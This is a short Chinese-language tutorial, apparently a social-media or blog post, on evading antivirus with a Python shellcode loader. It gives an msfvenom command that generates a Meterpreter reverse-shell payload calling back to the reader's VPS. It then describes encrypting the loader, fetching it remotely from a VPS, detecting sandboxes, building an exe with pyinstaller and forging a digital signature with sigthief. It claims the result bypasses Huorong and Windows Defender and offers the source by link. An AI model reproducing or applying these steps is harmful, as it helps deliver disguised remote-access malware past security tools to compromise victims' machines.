msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b 'x00' 生成shellcode

然后在线base64加密网址

将加密好的shellcode放入如下图的Piggo.py文件下的input_kali

(文章末尾回复免杀002获取源码)

这里对整个shellcode加载器进行序列化处理,并为base64的形式

在把序列化好的base64放入AES-Pig.py文件再进行一轮AES加密处理,目的在于防止杀软逆向回来

将加密好的AES密文另存为.txt,并放在可以访问的公网VPS上

然后来到codePig.py文件下

实现分离免杀远程请求回来的AES密文解密后进入判断是否在沙箱,不是就进行反序列化并base64解密执行shellcode

反沙箱也是一样的通过判断时间来确定是否在沙箱环境内

使用命令编译exe:
pyinstaller.exe -F -w -i 你的ico图标 codePig.py

这里使用sigthief.py注入数字签名

免杀效果:

核晶防护下正常反弹MSF并执行命令

火绒

Windows defender

公众号获取源码

链接：https://pan.quark.cn/s/60834c86b92e